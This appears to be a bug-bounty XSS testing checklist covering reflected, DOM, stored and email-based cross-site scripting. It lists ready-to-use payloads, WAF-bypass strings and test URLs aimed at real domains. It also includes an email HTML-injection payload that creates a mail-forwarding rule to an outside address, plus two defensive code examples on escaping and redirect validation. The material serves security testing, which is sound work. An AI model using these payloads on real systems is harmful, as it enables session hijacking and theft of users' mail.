Reflected Cross Site Scripting

Check List

Methodology

Black Box

XSS Reflected

1. Log in to any platform that allows creating or editing text-based pages (such as a wiki or documentation system)

2. Create a new page

3. In the field for the page identifier or slug, enter javascript:

4. Configure the page as follows:

   Title: javascript:
   Format: Markdown
   Content: [XSS](.alert(1);)

5. Save or publish the page

6. After the page is created, click the link labeled "XSS" in the page content

7. If the system is vulnerable, the JavaScript code will execute (e.g., an alert(1) dialog will appear)


XSS in Email

1. Create a new text file (e.g. email.txt)

2. Put the following exact contents into the file (including the headers and Content-type: text/html):

From: jouko@klikki.fi
To: jouko@hey.com
Subject: HackerOne test
MIME-Version: 1.0
Content-type: text/html

<style>
url(cid://\00003c\000027message-content\00003e\00003ctemplate\00003e\00003cstyle\00003exxx);
url(cid://\00003c/style\00003e\00003c/template\00003e\00003c/message-content\00003e\00003cform\000020action=/my/accounts/266986/forwardings/outbounds\000020data-controller=beacon\00003e\00003cinput\000020type=text\000020name=contact_outbound_forwarding[to_email_address]\000020value=joukop@gmail.com\00003e\00003c/form\00003exxx);
</style>

3. Send the email, using sendmail on Linux as an example:

/usr/sbin/sendmail -t < email.txt

(or use any other tool capable of sending raw MIME/HTML emails)

4. Open the recipient's HEY account and load the sent email (refresh the inbox/viewer if needed)

5. Inspect the rendered HTML to find injected tags or form elements (e.g. an injected <form ...> or <iframe ...>)

6. Observe any automatic behaviour triggered by the injected HTML (such as POST requests that create a forwarding rule, or a full-window iframe)

7. Repeat with the alternative payload examples from the report (the iframe-based spoof or the <script src=...> + hCaptcha payload) to verify the other exploitation vectors


Reflected XSS in Marketing Reports Page

1. Log in to the store's website and complete the authentication process

2. Go to the reports section of your profile

3. When the page loads, check the URL for parameters such as return_page_pathname= (the name may differ from site to site)

4. Inject the following payload into the parameter and check whether the code executes:

javascript:alert('XSS')

5. If the payload executes, the parameter is vulnerable


Reflected XSS in Error Message Parameters

1. Enter a site and complete the authentication process

2. During authentication, deliberately make an error in one of the parameters so that the authentication process fails

3. If you encounter an errmsg parameter in the subsequent requests, inject XSS payloads into it

4. For example, a request like the one below:

https://102.176.160.119:10443/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E

DOM XSS

1. Open Burp and make a request to the main page of the site

2. In the Response panel, use the search box to look for the string window.location.hash and check whether it is present

3. If it is, inject the payload shown below into the URL fragment and check whether it is reflected:

https://www.example.com/#<img src=x onerror=alert('XSS')>
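The window.location.hash sink that step 2 searches for, as an added example that is not part of the original checklist: the unsafe concatenation that makes the fragment above execute, beside an escaped form and an allow-listed form. The function names and the sample fragment are assumptions, and the code is written as pure string functions so it runs under Node without a DOM.

```javascript
// Added example, not from the original checklist. The unsafe pattern that the
// window.location.hash search is looking for, beside two hardened forms.
// Function names and the sample fragment are assumptions; written as pure
// string functions so it runs under Node without a DOM.

// Vulnerable sink: the fragment is concatenated into markup, so
// "#<img src=x onerror=alert('XSS')>" becomes live HTML
// (the browser equivalent is el.innerHTML = location.hash.slice(1)).
function renderHashUnsafe(hash) {
  const value = hash.startsWith('#') ? hash.slice(1) : hash;
  return '<div id="section">' + value + '</div>';
}

// Escape the five characters that let text break out of an HTML text node
// or a quoted attribute value.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened sink: the fragment is treated as data, never as markup
// (the browser equivalent is el.textContent = value).
function renderHashSafe(hash) {
  const value = hash.startsWith('#') ? hash.slice(1) : hash;
  return '<div id="section">' + escapeHtml(value) + '</div>';
}

// Stricter still: location.hash normally carries a section id, so only
// accept a short identifier and reject everything else outright.
function sectionIdFromHash(hash) {
  const value = hash.startsWith('#') ? hash.slice(1) : hash;
  return /^[A-Za-z0-9_-]{1,64}$/.test(value) ? value : null;
}

// Constructed sample: the fragment from the payload above.
const SAMPLE_HASH = "#<img src=x onerror=alert('XSS')>";

console.log('unsafe:', renderHashUnsafe(SAMPLE_HASH));   // markup survives intact
console.log('safe:  ', renderHashSafe(SAMPLE_HASH));     // rendered as inert text
console.log('id:    ', sectionIdFromHash(SAMPLE_HASH));  // null: rejected
```

When reviewing a hit for window.location.hash, the question is which of these three shapes the code around it has: if the fragment reaches innerHTML, document.write, eval, or a jQuery selector without passing through escaping or an allow-list, the page is exposed in the way step 3 tests for.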

DOM XSS in Redirect Parameter

1. Log out of the website

2. Capture the request with Burp and inspect it

3. If you find a request like the one below among the captured requests, inject the payload:

https://subdomain.example.net/?redirect=javascript:prompt(document.domain)%2f%2f

4. Log in through email


XSS Reflected in redirect_url

1. Log in to the site and complete the registration process

2. Trace the registration process with Burp and inspect the parameters

3. If you see a parameter called redirect_url (or a similar one, such as next_url in the example below), inject the following payload:

https://example.net/resign_request/success?next_url=javascript%3Aalert%2F**%2F(document.domain)

4. If the code is reflected, the parameter is vulnerable
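Server-side handling of the redirect parameters in the two sections above (redirect= and next_url= / redirect_url=), and equally of the javascript: slug in the first section, as an added example that is not from the original checklist: a validator that accepts only a same-site http(s) URL or a plain relative path and otherwise falls back to a fixed destination. The function name, the allowed host list and the sample values are assumptions.

```javascript
// Added example, not from the original checklist: validating a redirect
// parameter (redirect=, next_url=, redirect_url=) before it is placed in a
// Location header or an href. Function names, the allowed host list and the
// sample values are assumptions.

const ALLOWED_HOSTS = new Set(['example.net', 'www.example.net']);

// Returns a destination that is safe to redirect to, or the fallback.
// Only a same-site http(s) URL or a plain relative path is accepted, so
// javascript:, data:, vbscript: and scheme-relative (//host) values are all
// turned into the fallback rather than reflected.
function safeRedirect(value, { allowedHosts = ALLOWED_HOSTS, fallback = '/' } = {}) {
  if (typeof value !== 'string' || value.length === 0 || value.length > 2048) return fallback;

  // Browsers strip tab/newline from URLs, so "java\nscript:" is still a
  // javascript: URL to the browser; reject control characters outright.
  if (/[\u0000-\u0020\u007f]/.test(value)) return fallback;

  // A relative path: one leading slash, not "//host" or "/\host".
  if (/^\/(?![\/\\])/.test(value)) return value;

  let url;
  try {
    url = new URL(value);          // throws for "//host", "host/path", garbage
  } catch (_) {
    return fallback;
  }
  if (url.protocol !== 'https:' && url.protocol !== 'http:') return fallback;
  if (!allowedHosts.has(url.hostname)) return fallback;
  return url.href;
}

// Constructed sample values, including the decoded forms of the two
// payloads above. In a real app the framework has already percent-decoded
// the query string once, so the value must not be decoded a second time.
const SAMPLES = [
  'javascript:prompt(document.domain)//',
  'javascript:alert/**/(document.domain)',
  'java\nscript:alert(1)',
  '//evil.example/phish',
  'https://evil.example/',
  '/account/settings',
  'https://example.net/resign_request/success',
];

for (const s of SAMPLES) console.log(JSON.stringify(s), '->', safeRedirect(s));
```

The design choice is allow-list over deny-list: a filter that only strips the literal string javascript: is what the /**/ and %2f%2f variants on this page are built to get around, whereas parsing with the URL constructor and comparing the scheme and host leaves nothing for an encoding trick to slip past.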


Payload for WAF Bypass

1. https://www.example.com.br/testing%2522%80%2520accesskey='x'%2520onclick='confirm%601%60'

2. https://www.example.com.br/testing%2522%FF%2520accesskey='x'%2520onclick='confirm%601%60'

3. https://www.starbucks.com.br/testing%80%2522%2520accesskey='x'%2520onclick='confirm%601%60'

Location Information Parameter

1. Log in to your account and open your profile on the target site

2. Go to the general section of your account and enter the street address, city, and the following payload:

/"><!--><svg/onload=alert(document.domain)>)

3. After injecting, save, then log in again and open your location information and live view

4. For example, a path like the one below (keep in mind that this path can differ from site to site):

https://example.com/user/dashboards/live

White Box
